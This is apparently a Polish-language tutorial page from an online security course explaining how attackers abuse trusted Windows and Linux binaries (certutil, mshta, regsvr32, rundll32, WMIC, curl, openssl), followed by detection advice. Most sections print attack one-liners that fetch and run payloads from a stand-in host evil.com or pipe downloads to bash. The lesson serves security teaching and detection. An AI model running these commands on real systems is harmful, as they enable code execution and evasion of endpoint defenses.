Binarne pliki Living-Off-the-Land (LOLBins)
Wykorzysta Pan/Pani zaufane pliki binarne systemu Windows (certutil, mshta, regsvr32) do uniknięcia wykrycia.
Binarne pliki Living-Off-the-Land (LOLBins) to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Czym są LOLBins?
Living-Off-the-Land Binaries (LOLBins) to legalne pliki binarne i narzędzia systemu operacyjnego, wykorzystywane przez atakujących do wykonywania złośliwych działań. Ponieważ są to zaufane, podpisane narzędzia systemowe, często omijają listy dozwolonych aplikacji i ograniczają wykrywanie przez AV/EDR.
Dlaczego LOLBins są skuteczne
Korzyści dla atakujących:
- Są zawsze obecne w systemach docelowych — nie ma potrzeby dostarczania nowych plików
- Są podpisane przez Microsoft/Apple — omijają wykrywanie oparte na sygnaturach
- Są uznawane za zaufane przez rozwiązania do kontroli aplikacji
- Tworzą drzewa procesów wyglądające na legalne
PowerShell jako LOLBin
PowerShell jest najczęściej nadużywanym LOLBinem. Atakujący używają:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe to narzędzie systemu Windows do obsługi certyfikatów, które może pobierać pliki:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta i wscript
Wykonywanie skryptów za pośrednictwem zaufanych hostów:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe może ładować i wykonywać biblioteki DLL z odległych adresów URL za pośrednictwem flag /s /n /u /i — omijając AppLocker i uruchamiając niepodpisany kod jako zaufany proces:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllWMIC i wykonywanie za pomocą WMI
Windows Management Instrumentation umożliwia zdalne i lokalne wykonywanie kodu:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe ładuje i wykonuje punkty wejścia bibliotek DLL:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLOLBins w systemie Linux
Odpowiedniki w systemie Linux:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS i GTFOBins
Bazy referencyjne:
- LOLBAS (lolbas-project.github.io) — pliki binarne Windows, skrypty i biblioteki
- GTFOBins (gtfobins.github.io) — pliki binarne Linux/macOS służące do eksploatacji, odczytu i zapisu plików oraz eskalacji SUID
Wykrywanie nadużywania LOLBinów
Strategie wykrywania:
- Rejestrowanie bloków skryptów PowerShell (EventID 4104) — rejestruje zdekodowane polecenia
- Sysmon EventID 1: tworzenie procesu wraz z łańcuchem procesu nadrzędnego
- Alarmowanie o nieoczekiwanych relacjach nadrzędny–podrzędny: Word → PowerShell, Excel → cmd
- Połączenia sieciowe nawiązywane przez certutil, mshta i powershell
- Wartości bazowe UEBA sygnalizujące nietypowe użycie plików binarnych
Szybki test: LOLBins
Który plik binarny systemu Windows może pobrać zdalny plik za pomocą flagi -urlcache?
Podsumowanie lekcji
LOLBins to legalne narzędzia systemu operacyjnego wykorzystywane do złośliwych celów: PowerShell, certutil, mshta, regsvr32, rundll32 i WMIC w systemie Windows oraz curl, python i openssl w systemie Linux. Omijają wykrywanie oparte na sygnaturach i listy dozwolonych aplikacji. Wykrywanie wymaga rejestrowania tworzenia procesów (Sysmon), rejestrowania bloków skryptów PowerShell i baz zachowania. LOLBAS i GTFOBins to niezbędne bazy referencyjne.
Często zadawane pytania
Czy lekcja „Binarne pliki Living-Off-the-Land (LOLBins)” jest bezpłatna?
Tak — pełny tekst „Binarne pliki Living-Off-the-Land (LOLBins)” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Binarne pliki Living-Off-the-Land (LOLBins)”?
Wykorzysta Pan/Pani zaufane pliki binarne systemu Windows (certutil, mshta, regsvr32) do uniknięcia wykrycia. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.
Ile czasu zajmuje lekcja „Binarne pliki Living-Off-the-Land (LOLBins)”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Frameworki C2: Cobalt Strike i Sliver
- Binarne pliki Living-Off-the-Land (LOLBins)
- Techniki poruszania się lateralnego
- Pisanie raportów red teamu